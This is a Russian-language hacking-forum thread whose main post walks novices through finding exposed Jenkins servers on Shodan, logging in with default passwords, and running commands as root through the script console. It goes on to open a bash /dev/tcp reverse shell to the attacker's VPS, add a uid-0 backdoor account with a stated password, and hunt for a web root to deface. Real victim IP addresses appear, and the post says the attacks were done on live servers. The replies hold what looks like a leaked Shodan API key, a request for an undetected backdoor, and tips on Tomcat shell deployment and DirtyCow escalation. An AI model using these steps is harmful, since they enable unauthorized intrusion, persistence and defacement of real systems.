• XSS.stack #1 – первый литературный журнал от юзеров форума

Статья Shodan & Jenkins = root & deface ?

netcat

(L3) cache
Забанен
Регистрация
26.07.2019
Сообщения
158
Реакции
448
Пожалуйста, обратите внимание, что пользователь заблокирован
Приветствую тебя читатель, в этой маленькой статье хочется показать простую но банальную ошибку которая ведет к неприятностям.

Как ты понял из названия топика мы будем использовать несколько методов для поиска наших целей, но в основе всё равно лежит всеми любимый Shodan


AHTUNG :
1) Это не лабораторные условия, всё показывается на реальных серверах. Попытки повторить которые увенчались стуком погонов в дверь и вся отвественность на вас
2) Данный мануал или пример имеет направленность для новых пользователей которые не знают с чего начать, которым неизведана малая часть возможности Shodan и других сервисов..
3) Если вы уже знаете что к чему и довольно опытный, прошу подкат для обсуждений других векторов атак на Jenkins
4) В данный статье мы не будем использовать RCE or LPE экспы для пробива или повышения привилегий на целевом хосте. Статья показывает самый простой метод рута на серваке



I. Закуриваем сигаретку и ищем


Посмотрим сколько jenkins доступно в поисковике shodan по запросу :
Код:
x-jenkins
По итогу запроса видим цифру в виде 79816... Для того что бы отсеивать мусор не указывая порты можно искать по Favicon hash, а точнее
Код:
http.favicon.hash:81586312
1572810565911.png



Выполнив запрос мы получаем список из доступных серверов на базе ПО jenkins
При желаний можно отфильтровать по странам используя например
Код:
country:"US"

1572810914422.png




II. Вторая затяжка и пассы

Очень частые пароли которые встречаются это :

1) test : test
2) admin : admin
3) jenkins : jenkins
4) admin : jenkins
5) admin : test

Для целевого подбора можно использовать BurpSuite и многие другие тулзы по желанию. оставлю пару статей которые помогут освоить брут с бурпом
1) первая ссылка
2)
вторая ссылка


III. Третья затяжка и да будет консоль


Для примера берем сервер с IP : 47.94.192.181, и используем креды которые изложены выше, а точнее test : test

1572811055212.png



и конечно же удачно ловим авторизацию в панельку... Конечно ты можешь походить по вкладкам и потыкать кнопки, но советую сразу провалиться в консоль и проверить права ;)

1572811103308.png




Перейдя по ссылке http://47.94.192.181:8080/script выполняем скрипты, любые ) которые душе угодны..
как видим на скрине, запущен с правами рута и это очень плохо...


Код:
print "whoami".execute().text
1572811169201.png





IV. Четвертая затяжка и обратная оболочка



На примере одного из других серверов будет показано как :

1) прокинуть реверс шелл (что такое reverse-shell предлагаю загуглить и понять зачем он нужен)
2) добавить пользователя
3) и сделать маленький deface?

1. на своей VPS вешаем netcat и ждем коннекта.

Код:
 nc -nlvp 5656

1572812854950.png


1.1 на стороне jenkins-а используя возможности консоли запускаем скрипт для получения реверс-шелла
Код:
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/здесь_IP/5656;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

1572813001888.png




И ловим долгожданный реверс шелл на нашу VPS-ку

1572813298169.png


но для удобный работы в консоле нужно получить интерактивный шелл...
Используем и получаем нормальную оболочку =)

Код:
/bin/sh -i

1572813498675.png



По логике, так как мы от рута. Можем просто взять и создать пользователя с правами супер пользователя..

Код:
1) создаем пользователя useradd -ou 0 -g 0 vorobei
2) задаем пароль пользвателю passwd vorobei
3) пасс  vorobei_1337_vorobei

1572813624937.png




Дальше нам не нужна Консоль Jenkins и ревес-шелл, так как мы добавили юзера воробей ) коннектимся

1572813779933.png



1572813810089.png



1572813855037.png



по пути доступен http://47.92.171.189/common/layui/layui.js JS файл, используя команду find будем искать расположение веб приложения в виде веб морды.


Код:
find / -name "layui.js"

1572813965874.png


Находим расположение веб приложки.
1572814010512.png




V. Пятая затяжка и доедаем окурок...


1572814425601.png



THE END ?

Если дочитал то молодец. Очень надеюсь что ты узнал что-то нового для себя и понимаешь, что материал лежит перед тобой =) бери и работай..
 
Последнее редактирование:
Пожалуйста, обратите внимание, что пользователь заблокирован
У вас должно быть более 80 сообщений для просмотра скрытого контента.
Shodan API KEY : NdrATsgpk0O9nHgGH38CPVJM8sfpwuRE
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Thanks buddy; do you have any good undetected backdoor on unix so we can just run it ?
 
Пожалуйста, обратите внимание, что пользователь заблокирован
AHTUNG :
...
4) В данный статье мы не будем использовать RCE or LPE экспы для пробива или повышения привилегий на целевом хосте. Статья показывает самый простой метод рута на серваке

Критика очень важна и полезна если она правильная, как по вашему человек который не понимает суть входа в панель и выполнения скриптов с консоли будет запускать и юзать RCE экспы ? не понимая что он делает?

PS: если есть полезный вектор и интересный метод то все будут рады увидеть статью, я не говорю что бы палили рабочие темы =)
 
Пожалуйста, обратите внимание, что пользователь заблокирован
еще раз повторяюсь, в данном примере мы не используем экспы вобще! либо консоль от гостя или креды по дефолту.
Если не используются экспы это не означает то что автор не ознакомлен с ними.

В любом начинаний вы должны енумерить хост и смотреть все по дефолту а дальше смотреть сервисы и веб аплы, и только потом бить экспами что бы провалиться дальше.

Пример :
Tomcat , дефолт пассы tomcat : s3cret, деплой приложения .war c шеллом = профит
GlassFish, дефолт пассы и брут , деплой приложения c шеллом = профит

Итого, человек не знает как работает эксп под томкат но пробил и залил шелл. Но бывают случай когда в экспе намеренно удалена кавычка или он не работает на целевом хосте и что дальше?


Толку нет от человека если он не знает как скомпилить DirtyCow и повыситься на серваке, пока он сам руками не начнет ковырять
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Спасибо за внимание! Если вы новичок и вам понравился материал, просьба проголосовать https://xss.pro/threads/33507/
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх